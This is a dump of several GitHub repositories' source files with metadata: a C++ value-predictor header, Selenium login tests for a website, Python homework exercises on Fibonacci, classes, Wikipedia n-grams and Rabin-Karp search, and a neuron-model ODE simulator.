--iq=64 --iqnp=4 --fw=4 --dw=4 
--iw=8 --rw=4 -m2048 -e100000000 -c\" + i + \" pk\"\n\n\tprint(cmd)\n\n\tos.system(cmd)\n" }, { "alpha_fraction": 0.6147642731666565, "alphanum_fraction": 0.7053349614143372, "avg_line_length": 28.309091567993164, "blob_id": "30f9bcf8225733c9734b4220642a1a62e8a0dfc3", "content_id": "907d4aa8affdbd1a97450c4c2a046c7caadaa5a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1612, "license_type": "no_license", "max_line_length": 109, "num_lines": 55, "path": "/721sim-partial/uarchsim/predictor.h", "repo_name": "SureshN-Git/Hybrid_Address_Value_Predictor", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <inttypes.h>\n\nclass predictor\n{\nprivate:\n\tstruct pred\n\t{\n\t\tuint64_t last_val, last_val2, last_val3,last_val4, del, conf, iter_count;\n\t};\n\tstruct hyb_pred\n\t{\n\t\tuint64_t last_val, del, conf;\n\t};\n\tstruct VPT\t{\n\t\tuint64_t value, conf;\n\t};\n\n\tuint64_t *update_queue;\n\tuint64_t *chooser;\n\tbool choose;\n\tVPT *vpt;\n\thyb_pred *hystride;\n\tpred *predict;\npublic:\n\tint correct_predicted_count = 0;\n\tint misp_count = 0;\n\tint not_predicted_but_correct = 0;\n\tint not_predicted_not_correct = 0;\n\tint predicted =0;\n\tint counter = 0;\n\tint order = 0;\n\tint al_size;\n\tbool hybrid;\n\tuint64_t HASH;\n\tuint64_t uq_tail;\n\tuint64_t uq_head;\n\tpredictor(uint64_t AL_size, uint64_t type, uint64_t ORD);\n\tuint64_t stride(uint64_t tag);\n\tuint64_t last_value(uint64_t tag);\n\tuint64_t get_val(uint64_t type, uint64_t PC);\n\tuint64_t hash(uint64_t PC, uint64_t value1, uint64_t value2, uint64_t value3, uint64_t value4);\n\tvoid enqueue (uint64_t tag);\n\tuint64_t get_context_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tuint64_t get_hybrid_val(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tvoid update_predict(uint64_t value, uint64_t PC, uint64_t index);\n\tvoid dec_iter(uint64_t 
PC);\n\tvoid inc_iter(uint64_t PC);\n\tvoid clear_predictor();\n\tvoid checkpoint_context(uint64_t tail);\n\tbool get_conf(uint64_t PC);\n\tbool get_context_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\tbool get_hybrid_conf(uint64_t LV1, uint64_t LV2,uint64_t LV3,uint64_t LV4, uint64_t found, uint64_t PC);\n\t~predictor();\n};\n" } ]
7
Cynthia59/MylubanWeb
https://github.com/Cynthia59/MylubanWeb
37d4ada5ad56fa318d497bb788cb5501dcd523d8
ee74c46fca9f49c6efdb8cfbf52c11a1e6d5f086
4b92dbb6daaf575e9eaa4db45cb044a3f24bc644
refs/heads/master
2020-03-23T04:12:55.177144
2018-07-16T01:13:46
2018-07-16T01:13:46
141,070,503
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6596342921257019, "alphanum_fraction": 0.6765119433403015, "avg_line_length": 26.30769157409668, "blob_id": "9cf00800ecf3ea52e2134547048c0320383f6ee9", "content_id": "0086605d6cdc5a254558b7c5f340670ec6c82088", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 757, "license_type": "no_license", "max_line_length": 87, "num_lines": 26, "path": "/webtest/run_test.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = run_test\n@function = \n@author = Cindy\n@create_time = 2018/6/12 9:19\n@python_version = 3.x\n\"\"\"\n\nimport unittest, os, time, sys\nfrom HTMLTestRunner import HTMLTestRunner\nfrom testcase.models.function import copy_latest_report\n\n# 指定测试用例为当前文件夹下的testcase目录\ntest_dir = './testcase'\ndiscover = unittest.defaultTestLoader.discover(test_dir, pattern='*_test.py')\n\nif __name__ == '__main__':\n now = time.strftime(\"%Y-%m-%d %H-%M-%S\")\n filename = './report/' + now + 'result.html'\n fp = open(filename, 'wb')\n runner = HTMLTestRunner(stream=fp, title='myluban web test', description='用例执行情况:')\n runner.run(discover)\n fp.close()\n copy_latest_report()\n\n" }, { "alpha_fraction": 0.5771812200546265, "alphanum_fraction": 0.6644295454025269, "avg_line_length": 15.55555534362793, "blob_id": "0c7ec3827c3b7365efed8c0c560cfa2c28497932", "content_id": "fa1b48e798b89307d4a067fe5ab7cde654efc3ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/webtest/testcase/page_obj/desktopPage.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = desktopPage\n@function = \n@author = Cindy\n@create_time = 2018/6/13 16:22\n@python_version = 3.x\n\"\"\"\n" }, { "alpha_fraction": 0.6246649026870728, 
"alphanum_fraction": 0.6278820633888245, "avg_line_length": 34.20754623413086, "blob_id": "a041addd9d61140a4d25f7491ff2dca4eef683f2", "content_id": "91c804f68e28f199450b31f62666c8759c902c42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2099, "license_type": "no_license", "max_line_length": 73, "num_lines": 53, "path": "/webtest/testcase/login_test.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from time import sleep\nimport unittest, random, sys\nsys.path.append(\"./models\")\nsys.path.append(\"./page_obj\")\nfrom models import myunit, function\nfrom page_obj.loginPage import login\n\n\nclass loginTest(myunit.MyTest):\n \"\"\"myluban登录测试\"\"\"\n def user_login_verify(self, username=\"\", password=\"\"):\n login(self.driver).user_login(username, password)\n\n def test_login1(self):\n \"\"\"用户名、密码为空登录\"\"\"\n self.user_login_verify()\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"user_pwd_empty\")\n\n def test_login2(self):\n \"\"\"用户名正确、密码为空登录\"\"\"\n self.user_login_verify(username=\"pytest\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"pwd_empty\")\n\n def test_login3(self):\n \"\"\"用户名为空、密码正确登录\"\"\"\n self.user_login_verify(password=\"abc123456\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_empty_hint(), \"提示:请输入鲁班通行证账号或密码\")\n function.insert_img(self.driver, \"user_empty\")\n\n def test_login4(self):\n \"\"\"用户名与密码不匹配\"\"\"\n character = random.choice('zyxwvutsrqponmlkjihgfedcba')\n username = \"cynthia\" + character\n self.user_login_verify(username=username, password=\"cynthia123456\")\n po = login(self.driver)\n self.assertEqual(po.user_pwd_error_hint(), \"提示:账户名或者密码错误!\")\n function.insert_img(self.driver, \"user_pwd_error\")\n\n def test_login5(self):\n \"\"\"用户名、密码正确\"\"\"\n 
self.user_login_verify(username=\"cynthia\", password=\"cynthia123456\")\n sleep(2)\n po = login(self.driver)\n self.assertEqual(po.user_login_success(), \"桌面\")\n function.insert_img(self.driver, \"user_pwd_true\")\n \nif __name__ == \"__main__\":\n unittest.main()" }, { "alpha_fraction": 0.6130884289741516, "alphanum_fraction": 0.6239954233169556, "avg_line_length": 31.27777862548828, "blob_id": "c3a556b07a006587a85c3d562d7efee99b869c7a", "content_id": "c50fd0101bee2368d2b78bcbe4e887657b87d999", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1928, "license_type": "no_license", "max_line_length": 107, "num_lines": 54, "path": "/webtest/testcase/page_obj/loginPage.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom .base import Page\nfrom time import sleep\n\n\nclass login(Page):\n '''用户登录页面'''\n\n url = '/#/login'\n\n #登录输入控件\n login_username_loc = (By.XPATH, \"//*[@placeholder='请输入鲁班通行证账号或手机号']\")\n login_password_loc = (By.XPATH, \"//*[@placeholder='请输入密码']\")\n login_button_loc = (By.ID, \"loginPer\")\n \n # 登录用户名\n def login_username(self, username):\n self.fine_element(*self.login_username_loc).send_keys(username)\n \n # 登录密码\n def login_password(self, password):\n self.fine_element(*self.login_password_loc).send_keys(password)\n \n # 登录按钮\n def login_button(self):\n self.fine_element(*self.login_button_loc).click()\n \n # 定义统一登录入口\n def user_login(self, username=\"username\", password=\"1111\"):\n \"\"\"获取的用户名密码登录\"\"\"\n self.open()\n sleep(1)\n self.login_username(username)\n self.login_password(password)\n self.login_button()\n sleep(1)\n\n #登录验证控件\n user_pwd_empty_hint_loc = (By.XPATH, \"/html/body/div[1]/div[2]/div[2]/div/div[1]/form/div/div[4]/p[2]\")\n user_pwd_error_hint_loc = (By.XPATH, 
\"/html/body/div[1]/div[2]/div[2]/div/div[1]/form/div/div[4]/p[1]\")\n user_login_success_loc = (By.XPATH, \"/html/body/div[1]/div[2]/div[1]/div[1]/ul/li[1]\")\n\n # 用户名密码为空提示\n def user_pwd_empty_hint(self):\n return self.fine_element(*self.user_pwd_empty_hint_loc).text\n \n # 用户名密码错误提示\n def user_pwd_error_hint(self):\n return self.fine_element(*self.user_pwd_error_hint_loc).text\n \n # 登录成功用户名\n def user_login_success(self):\n return self.fine_element(*self.user_login_success_loc).text" }, { "alpha_fraction": 0.5436241626739502, "alphanum_fraction": 0.6308724880218506, "avg_line_length": 15.55555534362793, "blob_id": "0e91412cac420d62b0b7cf4324ef170a80936039", "content_id": "019d999dbf9e770f3e0b1f541fca7b68fae12f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/webtest/testcase/__init__.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "#encoding: utf-8\n\"\"\"\n@project = MylubanWeb\n@file = __init__.py\n@function = \n@author = Cindy\n@create_time = 2018/6/11 11:08\n@python_version = 3.x\n\"\"\"\n" }, { "alpha_fraction": 0.6026272773742676, "alphanum_fraction": 0.6083743572235107, "avg_line_length": 28.731706619262695, "blob_id": "b71f479733b89368f4e6749d56774362dc3eabda", "content_id": "c558023438b798bfe685babc57f64de3d067de2f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1308, "license_type": "no_license", "max_line_length": 67, "num_lines": 41, "path": "/webtest/testcase/models/function.py", "repo_name": "Cynthia59/MylubanWeb", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nimport os, shutil\n\n# 截图函数\ndef insert_img(driver, file_name):\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n base = base_dir.split('/testcase')[0]\n file_path 
= base + \"/report/image/\" + file_name + \".png\"\n driver.get_screenshot_as_file(file_path)\n\n# 查找最新的测试报告\ndef latest_report():\n base_dir = os.path.dirname(os.path.dirname(__file__))\n base_dir = str(base_dir)\n base_dir = base_dir.replace('\\\\', '/')\n base = base_dir.split('/testcase')[0]\n result_dir = base + \"/report\"\n lists = os.listdir(result_dir)\n # 重新按时间对目录下的文件进行排序\n lists.sort(key=lambda fn: os.path.getmtime(result_dir+\"\\\\\"+fn))\n print('最新的文件为: ' + lists[-1])\n file = os.path.join(result_dir, lists[-1]).replace('\\\\','/')\n # print(file)\n return file\n\n#复制最新的测试报告\ndef copy_latest_report():\n old = latest_report()\n new = old.split('/20')[0] + '/new_report.html'\n shutil.copyfile(old, new)\n # print('copy done!')\n\n \nif __name__ == '__main__':\n driver = webdriver.Chrome()\n driver.get(\"http://www.baidu.com\")\n insert_img(driver, 'baidu')\n driver.quit()\n copy_latest_report()" } ]
6
dariasuslova/python_homework
https://github.com/dariasuslova/python_homework
98c712c7bab123f7a26aa0cfe428f9e6b496af0c
d32e160d8c64111beb1338d48e47a35c1e01b3a0
8a8815642a27809402224518b5bd01960270060b
refs/heads/master
2021-01-23T14:41:37.000950
2018-03-21T11:49:06
2018-03-21T11:49:06
102,695,549
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5462962985038757, "alphanum_fraction": 0.5462962985038757, "avg_line_length": 21.285715103149414, "blob_id": "b1b8734d308d1636e5b6794c3b17a89f849a3fc6", "content_id": "cb4964173616b66e309a57d434fc423e74e5c5fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 42, "num_lines": 14, "path": "/homework_1/task_3.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "class UniqObject:\r\n obj = None\r\n \r\n def __init__(self, name):\r\n self.name = name\r\n \r\n @classmethod\r\n def create_object(cls):\r\n if cls.obj is None:\r\n cls.obj = UniqObject('object')\r\n return cls.obj\r\n \r\nSingleton = UniqObject('object')\r\nprint(Singleton.create_object())" }, { "alpha_fraction": 0.41056910157203674, "alphanum_fraction": 0.4390243887901306, "avg_line_length": 16.923076629638672, "blob_id": "2849ee55102259285c4fe362b52013745d6d8778", "content_id": "43c330173faf4a38c376e8d6f643f51db00f432d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 30, "num_lines": 13, "path": "/homework_1/task_1.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "def fibonacci(n):\r\n if n.__class__ is not int:\r\n return None\r\n elif n == 0:\r\n return 0\r\n elif n == 1:\r\n return 1\r\n x, y = 0, 1\r\n for i in range (n):\r\n x, y = y, x+y\r\n return x\r\n\r\nprint(fibonacci(6))\r\n" }, { "alpha_fraction": 0.4672068953514099, "alphanum_fraction": 0.4818941652774811, "avg_line_length": 26.22068977355957, "blob_id": "0f393af45d9c533f8422fe7ec7e9bb8998126725", "content_id": "22d47eb56723c0cb3a09dc7e5af61275b62785d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3951, "license_type": "no_license", "max_line_length": 90, "num_lines": 145, 
"path": "/homework_3/python_hw3.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[1]:\n\n\nfrom pattern.web import Wikipedia, plaintext\nimport re\nimport nltk\nnltk.download('punkt')\nnltk.download('stopwords')\nfrom nltk import word_tokenize\nfrom nltk.collocations import *\nfrom collections import Counter, defaultdict\nfrom itertools import islice, tee\nimport math\nfrom nltk.corpus import stopwords\n\n\n# In[2]:\n\n\nclass WikiParser:\n def __init__(self):\n pass\n def get_articles(self, start):\n list_of_strings = []\n article = Wikipedia().article(start)\n cleaned1 = article.plaintext()\n clean1 = re.sub(r'[,;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', cleaned1)\n new1 = clean1.replace(' ', ' ')\n new1 = new1.lower()\n list_of_strings.append(new1)\n l = article.links\n for i in l:\n a = Wikipedia(language='en').article(i)\n if a is not None:\n cleaned = a.plaintext()\n clean = re.sub(r'[,;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', cleaned)\n new = clean.replace(' ', ' ')\n new = new.lower()\n list_of_strings.append(new)\n \n return list_of_strings\n\n\n# In[8]:\n\n\nclass TextStatistics:\n def __init___(self, articles):\n self.articles = articles\n pass\n def get_top_3grams(self, n, use_idf=False):\n d = defaultdict(int)\n a = self.articles\n sentences = []\n ar1 = []\n split_regex = re.compile(r'[.|!|?|…]')\n for i in a:\n sent = filter(lambda t: t, [t.strip() for t in split_regex.split(i)])\n sentences.append(sent)\n r1 = re.sub('[\\.,!?;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', i)\n ar1.append(r1)\n kolvo = len(sentences)\n ngrams = zip(*(islice(seq, index, None) for index, seq in enumerate(tee(ar1, 3))))\n ngrams = [''.join(x) for x in ngrams]\n cntr = Counter(ngrams).most_common(n)\n for ngr in ngrams:\n for sent in sentences:\n if ngr in sent:\n if d[ngr]<kolvo: \n d[ngr]+=1\n if use_idf == True: \n res = []\n for nr, ch in cntr:\n for h, pred in d.items():\n if nr == h:\n res.append((nr, ch*math.log(kolvo/pred)))\n 
return (res)\n else:\n return(cntr)\n\n def get_top_words(self, n, use_idf=False):\n a1 = self.articles\n d1 = defaultdict(int)\n t1 = []\n tokens = []\n for aa in a1:\n re.sub('[\\.,!?;:\\(\\)\"\\[\\]<>\\*\\^\\-]*', '', aa)\n for a2 in a1:\n word_tokenize(a2)\n #tokens.append(tok)\n filtered_words = [word for word in a1 if word not in stopwords.words('english')]\n cnt = Counter(filtered_words).most_common(n)\n for w in filtered_words:\n for t in a1:\n if w in t:\n if d1[w]<len(a1): \n d1[w]+=1\n if use_idf == True: \n res1 = []\n for ws, c in cnt:\n for wrd, tx in d1.items():\n print(ws, c)\n print(wrd, tx)\n if ws == wrd:\n res1.append((ws, c*math.log(len(a1)/tx)))\n return (res1)\n else:\n return (cnt)\n\n\n# In[119]:\n\n\nt = Wikipedia().article('Hotels.com')\ncleaned = t.plaintext()\ncl = TextStatistics()\ncl.articles = cleaned\nprint(cl.get_top_3grams(20))\nprint(cl.get_top_words(20, True))\n\n\n# In[4]:\n\n\nclass Experiment:\n def __init__(self):\n pass\n def show_results(self):\n c = WikiParser()\n texts = c.get_articles(\"Natural language processing\")\n cl = TextStatistics()\n cl.articles = texts\n n = cl.get_top_3grams(20)\n w = cl.get_top_words(20, True)\n return ('3grams 20 top:{} /n top 20 words {}'.format(n,w))\n \n\n\n# In[9]:\n\n\ncla = Experiment()\nprint(cla.show_results())\n\n" }, { "alpha_fraction": 0.5124074816703796, "alphanum_fraction": 0.5180670619010925, "avg_line_length": 22.94565200805664, "blob_id": "b2994ddfd80890be29c4a677c66d71013d830e9b", "content_id": "970c76bc5be956b3a4841d7558b35d57c999d974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2363, "license_type": "no_license", "max_line_length": 99, "num_lines": 92, "path": "/homework_1/task_2.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\r\nimport random\r\n\r\nclass Bird:\r\n def __init__(self, name):\r\n self._name = name\r\n def get_name(self):\r\n return self._name\r\n def 
can_fly(self):\r\n return True\r\n def colour(self):\r\n return('multi-coloured')\r\n def can_be_feeded(self):\r\n return False\r\n def you_can_touch(self):\r\n return False\r\n \r\nclass WildBird(Bird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n\r\nclass HomeBird(Bird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def can_be_feeded(self):\r\n return True\r\n \r\n \r\nclass Calibri(WildBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'Blue'\r\n\r\nclass Chicken(HomeBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'White'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.35:\r\n return True\r\n else:\r\n return False\r\n \r\n\r\nclass Owl(WildBird): #Полиморфизм \r\n def __init__(self, name):\r\n super().__init__(name)\r\n \r\n def colour(self):\r\n return 'Snowy'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.75:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Goose(HomeBird): #Полиморфизм\r\n def __init__(self, name):\r\n super().__init__(name)\r\n\r\n def colour(self):\r\n return 'White'\r\n \r\n def you_can_touch(self):\r\n if random.random() > 0.85:\r\n return True\r\n else:\r\n return False\r\n\r\nclass Human:\r\n def __init__(self, birdy):\r\n self.birdy = birdy\r\n \r\n def hooman_and_birdy(self):\r\n if self.birdy.you_can_touch() == True and self.birdy.can_be_feeded() == True:\r\n return 'Hooman can feed and touch %s %s' % (self.birdy.colour(), self.birdy.get_name())\r\n else:\r\n return \"%s %s is a wild bird\" % (self.birdy.colour(), self.birdy.get_name())\r\n \r\nbirdybird = Chicken('Liza')\r\nhuman = Human(birdybird)\r\nprint(human.hooman_and_birdy())\r\nbirdybird2 = Owl('Hedwig')\r\nhuman2 = Human(birdybird2)\r\nprint(human2.hooman_and_birdy())\r\n" }, { "alpha_fraction": 0.5493171215057373, "alphanum_fraction": 
0.5776429176330566, "avg_line_length": 36.980770111083984, "blob_id": "107ac93963f65efd8cb6e180414af42b2bd0c568", "content_id": "964fcb0598908c4471863b9105f72dfa92251b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2132, "license_type": "no_license", "max_line_length": 192, "num_lines": 52, "path": "/homework_4/homework_4.py", "repo_name": "dariasuslova/python_homework", "src_encoding": "UTF-8", "text": "\ndef poly_hash(s, x=31, p=997):\n h = 0\n for j in range(len(s)-1, -1, -1):\n h = (h * x + ord(s[j]) + p) % p\n return h\n\ndef search_rabin_multi(text, patterns):\n indices = []\n for pattern in patterns:\n pos=[]\n pattern_hash = poly_hash(pattern)\n for i in range(len(text) - len(pattern)):\n substr_hash = poly_hash(text[i: i + len(pattern)])\n if substr_hash == pattern_hash:\n if text[i: i + len(pattern)] == pattern:\n pos.append(i)\n indices.append(pos)\n return indices\n\n# ###### Асимтоматическая оценка сложности алгоритма\n# сложность функции poly_hash равняется O(n), так как в ней всего один цикл => сложность функции search_rabin_multi будет включать в себя сложность функции poly_hash => сложность фунции O(n^3)\n\nfrom unittest import *\n\nclass SearchNaiveTest(TestCase):\n def setUp(self):\n self.search = search_rabin_multi\n def test_empty(self):\n text = ''\n patterns = ['w', 't']\n self.assertEqual(len(self.search(text, patterns)[0]), 0)\n self.assertEqual(len(self.search(text, patterns)[1]), 0)\n \n def test_empty_pattern(self):\n text = 'cat'\n patterns = []\n self.assertEqual(len(self.search(text, patterns)), 0)\n \n def test_big_pattern(self):\n text = 'dog'\n patterns = ['dogdogdog']\n self.assertEqual(len(self.search(text, patterns)[0]), 0)\n \n def test_count(self):\n text = 'Betty Botter bought some butter, But, she said, the butter’s bitter. 
If I put it in my batter, It will make my batter bitter.'\n patterns = ['tt', 'll', 'ke', 'i']\n indices = [[2, 8, 27, 66, 75, 113, 149, 156], [136], [141], [56, 74, 102, 105, 135, 155]]\n self.assertListEqual(self.search(text, patterns), indices)\n \ncase = SearchNaiveTest()\nsuite = TestLoader().loadTestsFromModule(case)\nTextTestRunner().run(suite)\n\n" } ]
5
bernatguillen/neuronpy
https://github.com/bernatguillen/neuronpy
0f5ef03753c65d5e7ccd68fb81d6ecc6ed0d2523
fcf0c345b323bf628e15868c080bb0c060638dde
4bc90cb2dd090311c34a9d245d733691a4094d2c
refs/heads/master
2016-06-02T15:37:49.052548
2015-02-12T03:38:18
2015-02-12T03:38:18
28,929,038
1
1
null
2015-01-07T19:02:41
2015-01-16T00:48:30
2015-01-16T23:48:46
Python
[ { "alpha_fraction": 0.5337978005409241, "alphanum_fraction": 0.5676897168159485, "avg_line_length": 37.456520080566406, "blob_id": "80c531abaacacd1f89513e8403301271326a2017", "content_id": "a0d4777d34b1cb3a2cc1c1d1f63c80320333eb16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5311, "license_type": "no_license", "max_line_length": 371, "num_lines": 138, "path": "/neuropy/neuron.py", "repo_name": "bernatguillen/neuronpy", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.integrate import ode\nfrom collections import Counter\n\nclass Environ(object):\n \"\"\"\n Environ holds all the 'global' variables\n \"\"\"\n\n def __init__(self,initvars = None):\n if initvars is None:\n CPG = {\"C\":2.4 , \"ep\":2.5, \"de\":0.051, \"gKS\":0.19, \"Iext\":37., \"Syn\":{\"CPG\":{\"vSyn\":0.,\"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":0.2}, \"Df\":{\"vSyn\":0., \"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":0.6}, \"Ds\":{\"vSyn\":-10., \"kSyn\":0.8, \"tauSyn\":5., \"gSyn\":2.}}}\n Df = {\"C\":2.4 , \"ep\":2.5, \"de\":0.051, \"gKS\":0.25, \"Iext\":37.}\n Ds = {\"C\":2.4 , \"ep\":2, \"de\":0.0002, \"gKS\":0.5, \"Iext\":50.}\n initvars={\"gK\":9.0 , \"gCa\":4.4, \"gL\":2.0, \"EK\":-80., \"ECa\":120., \"EL\":-60., \"VCa\":-1.2, \n \"kCa\":1./18., \"VK\":2., \"kK\":1./10., \"kc\":0.7, \"Vc\":-25., \"neu\":{\"CPG\":CPG,\"Df\":Df, \"Ds\":Ds}}\n vars(self).update(initvars)\n\n\nclass Model(Environ):\n \"\"\"\n Model represents the model in Ghiglia, Holmes paper:\n Cv' = - [ICa + IK + IL + IKS] + Iext\n m' = ep/tm(v)*(mInf(v)-m)\n c' = del/tc(v)*(cInf(v)-c)\n\n ICa = gCa*nInf(v)(v-ECa)\n IL = gL*(v-EK)\n IK = gK*m*(v-EK)\n IKS = gKS*c*(v-EK)\n wInf(v) = 1/(1+exp(-kw(v-vwth))) = 0.5*(1+tanh(-kw(v-vwth)/2)) (w = m,c,n)\n tw(v) = sech(kw(v-vwth)) (w = m,c,n)\n \"\"\"\n\n def __init__(self, cls, initvars = None):\n super(Model, self).__init__(initvars)\n initvars2 = self.neu.get(cls)\n vars(self).update(initvars2)\n self.cls = cls\n 
\n def singledyn(self,t,V,m,c,Iadd = 0):\n\n mInf = 0.5*(1+np.tanh((V-self.VK)*self.kK))\n cInf = 0.5*(1+np.tanh((V-self.Vc)*self.kc))\n nInf = 0.5*(1+np.tanh((V-self.VCa)*self.kCa))\n #tm = 1./cosh((V-self.env.V3)/(2*self.env.V4))\n #tc = 1./cosh((V-self.env.Vc)*self.env.kK/4)\n ICa = self.gCa*nInf*(V-self.ECa)\n IK = self.gK*m*(V-self.EK)\n IKS = self.gKS*c*(V-self.EK)\n IL = self.gL*(V-self.EL) #EK in paper\n Iext = self.Iext + Iadd\n Vd = -1./self.C*(ICa + IK + IL + IKS) + Iext/self.C\n md = self.ep*(mInf-m)*np.cosh(self.kK*(V-self.VK)/2)\n cd = self.de*(cInf-c)*np.cosh(self.kK*(V-self.Vc)/2)\n \n return [Vd, md, cd]\n \nclass Synapse(object):\n \"\"\"\n Synapse is an object that contains the model for s12\n \"\"\"\n \n def __init__(self,cls1,cls2,initvars12 = None):\n self.mod1 = Model(cls1)\n self.mod2 = Model(cls2)\n if initvars12 is None:\n initvars12 = self.mod1.Syn.get(cls2)\n vars(self).update(initvars12)\n def synapsedyn(self,V1,s):\n Sinf =\t1./(1+np.exp(-self.kSyn*(V1-self.vSyn)));\n sd\t=\t1./self.tauSyn*(Sinf*(1-s)-s);\n return sd\n \nclass Neuron(Model):\n \"\"\"\n Neuron is an object that contains the model for V, w and c\n \"\"\"\n \n def dyn(self,t,x):\n [V,m,c] = x\n xd = self.singledyn(t,V,m,c)\n return np.array([xd])\n \n def sym(self,t0,x0,tmax,dt):\n\n r = ode(self.dyn).set_integrator('dopri5')\n r.set_initial_value(np.array(x0),t0) \n t = [t0]\n xd = [np.array(x0)]\n while r.successful() and r.t < tmax:\n r.integrate(r.t + dt)\n t.append(r.t)\n xd.append(r.y)\n # print(\"%g %g %g %g\" %(r.t, r.y[0],r.y[1],r.y[2]))\n print(r.successful())\n return [t, xd]\n\nclass System(object):\n \"\"\"\n System represents the system of neurons and synapses that we will simulate\n \"\"\"\n def __init__(self,cls,connect):\n self.neurons = cls\n aux = Counter(cls)\n self.models = {key : Model(key) for key in aux}\n self.N = connect.shape[0]\n self.syns = {}\n for i in range(self.N):\n for j in range(self.N):\n if connect[i,j] == 1:\n 
self.syns.setdefault((cls[i],cls[j]),[]).append(np.array([i,j]))\n self.syns = {key:np.vstack(self.syns[key]) for key in self.syns}\n self.synmodels = {key: Synapse(*key) for key in self.syns}\n self.xd = np.hstack((np.zeros((self.N,1)),np.zeros((self.N,1)),\n np.zeros((self.N,1)),np.zeros((self.N,self.N))))\n def dyn(self,t,x):\n y= x.reshape(self.N,3+self.N)\n Iadd = np.array([sum([getattr(self.synmodels.get((self.neurons[i],self.neurons[j])),'gSyn',0)*y[i,j+3]*(y[j,0]-getattr(self.synmodels.get((self.neurons[i],self.neurons[j])),'vSyn',0)) for i in range(self.N)]) for j in range(self.N)]) #all the synaptic info that comes from other neurons is added here to form the exterior current that will be included in the dynamics\n for key in self.models:\n [V,m,c]=self.models[key].singledyn(t,y[np.where([i == key for i in self.neurons]),0],y[np.where([i == key for i in self.neurons]),1], y[np.where([i == key for i in self.neurons]),2], Iadd = Iadd[np.where([i == key for i in self.neurons])])\n [self.xd[np.where([i == key for i in self.neurons]),0],self.xd[np.where([i == key for i in self.neurons]),1],self.xd[np.where([i == key for i in self.neurons]),2]] = [V,m,c]\n for key in self.syns:\n self.xd[self.syns.get(key)[:,0],self.syns.get(key)[:,1]+3] = self.synmodels.get(key).synapsedyn(y[self.syns.get(key)[:,0],0],y[self.syns.get(key)[:,0],self.syns.get(key)[:,1]+3])\n return self.xd.reshape(-1)\n \n def sym(self,t0,x0,tmax,dt):\n r = ode(self.dyn).set_integrator('dopri5')\n r.set_initial_value(x0.reshape(-1),t0) \n t = [t0]\n x = [x0.reshape(-1)]\n while r.successful() and r.t < tmax:\n r.integrate(r.t + dt)\n t.append(r.t)\n x.append(r.y)\n # print(\"%g %g %g %g\" %(r.t, r.y[0],r.y[1],r.y[2]))\n print(r.successful())\n return [t, x]\n " }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 20, 